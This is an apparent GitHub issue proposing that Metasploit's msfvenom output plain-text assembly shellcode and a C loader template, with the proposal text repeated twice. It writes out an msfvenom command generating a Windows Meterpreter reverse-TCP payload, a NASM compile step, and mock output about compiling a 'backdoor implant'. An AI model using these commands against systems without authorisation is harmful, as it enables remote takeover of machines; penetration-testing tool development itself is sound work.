You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
My idea: no binary output, you rather get raw valid assembly data and a C loader.
New command syntax to reflect my idea:
msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip lport=your_port --template=C --format=plain-text (plain text assembly) or --format=compiled-hex (this will give the assembly shellcode directly compiled in byte-code)
Expected output
Using staged x86 payload...
Generating folder 'metsrv'...
Done
[1.] Template.c ready in 'metsrv' folder
[2.] Shellcode.asm ready in 'metsrv' folder
In case one used the "compiled" flag, you get [2.] Shellcode.txt containing bytecode in hex format
[tip] nasm -f win32 Shellcode.asm -o Shellcode.obj
[msfconsole_alert] Download NASM and Mingwx86-x64-GCC, compile the backdoor implant and place the output in metasploit-framework/bin/templates/payloads/reverse_tcp_meterpreter/staged -- Enjoy shell.
To-do: add error handling to fight bad inputs for this scenario.
To compensate for losing novices, new students or the "I can hack your facebook" guy, please, consider adding Docs about how to use NASM and Mingw-GCC to compile the backdoor implant.
Benefices: with this idea, the pentester has granular control and simplified workflow. You don't have to figure-out anything anymore with a Debugger, becouse msfvenom now prints plain-text code.
The text was updated successfully, but these errors were encountered:
Current msfvenom does something like this.
shellcode -> template.exe = shellcode+template.exe
My idea: no binary output, you rather get raw valid assembly data and a C loader.
New command syntax to reflect my idea:
msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip lport=your_port --template=C --format=plain-text (plain text assembly) or --format=compiled-hex (this will give the assembly shellcode directly compiled in byte-code)
Expected output
Using staged x86 payload...
Generating folder 'metsrv'...
Done
[1.] Template.c ready in 'metsrv' folder
[2.] Shellcode.asm ready in 'metsrv' folder
In case one used the "compiled" flag, you get [2.] Shellcode.txt containing bytecode in hex format
[tip] nasm -f win32 Shellcode.asm -o Shellcode.obj
[msfconsole_alert] Download NASM and Mingwx86-x64-GCC, compile the backdoor implant and place the output in metasploit-framework/bin/templates/payloads/reverse_tcp_meterpreter/staged -- Enjoy shell.
To-do: add error handling to fight bad inputs for this scenario.
To compensate for losing novices, new students or the "I can hack your facebook" guy, please, consider adding Docs about how to use NASM and Mingw-GCC to compile the backdoor implant.
Benefices: with this idea, the pentester has granular control and simplified workflow. You don't have to figure-out anything anymore with a Debugger, becouse msfvenom now prints plain-text code.
The text was updated successfully, but these errors were encountered: